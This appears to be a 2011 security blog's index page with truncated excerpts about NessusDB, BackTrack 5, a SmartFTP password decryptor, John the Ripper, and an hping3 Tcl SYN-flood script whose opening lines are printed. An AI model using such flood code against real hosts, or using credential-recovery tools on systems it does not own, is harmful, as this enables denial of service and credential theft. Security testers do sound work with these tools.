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NessusDB(Nessus XMLv2 parser) 1.4.2 release Usage: Viewing the Data Viewing the data is as easy as using any standard database client for the database you are using. As seen in these screenshots with Sequel Pro: NessusDBNessusDB is Nessus parser, that converts the generated reports into a ActiveRecord database, this allows for easy report generation and vulnerability verification. Version 1.4.2 is the current release. RequirementsRubyNess.. 2011. 5. 16.
BackTrack 5 Release (revolution) The BackTrack Dev team has worked furiously in the past months on BackTrack 5, code name “revolution”. Today, we are proud to release our work to the public, and then rest for a couple of weeks. This new revision has been built from scratch, and boasts several major improvements over all our previous releases. Based on Ubuntu Lucid LTS. Kernel 2.6.38, patched with all relevant wireless injection.. 2011. 5. 11.
SmartFTP Password Decryptor (free) About SmartftpPasswordDecryptor SmartftpPasswordDecryptor is the FREE software to instantly recover FTP login passwords stored by SmartFTP - one of the popular FTP clients. SmartFTP stores the password for all the past FTP sessions in user profile location so that user don't have to enter it every time. SmartftpPasswordDecryptor makes it easy to quickly scan & decrypt all these stored FTP login .. 2011. 5. 6.
SYN flood attack -- hping network security tool SYN flood -- synflood.htcl # (c) GPL2 fluxist(at)gmail.com # Usage; hping3 exec ./synflood.htcl if {$argc < 2} { puts "Required arguments: hostname dstport" exit 1 } foreach {hostname port} $argv break set srcport 14000 set target [hping resolve $hostname] set myaddr [hping outifa $target] puts "Synflooding $target..." while {1} { hping send "ip(saddr=$myaddr,daddr=$target)+tcp(sport=$srcport,dp.. 2011. 5. 4.
John the Ripper password cracker update This is the change log for JtR version 1.7.7: Added Intel AVX and AMD XOP instruction sets support for bitslice DES (with C compiler intrinsics). New make targets: linux-x86-64-avx, linux-x86-64-xop, linux-x86-avx, and linux-x86-xop (these require recent versions of GCC and GNU binutils). A “dummy” “format” is now supported (plaintext passwords encoded in hexadecimal and prefixed with “$dummy$”).. 2011. 4. 29.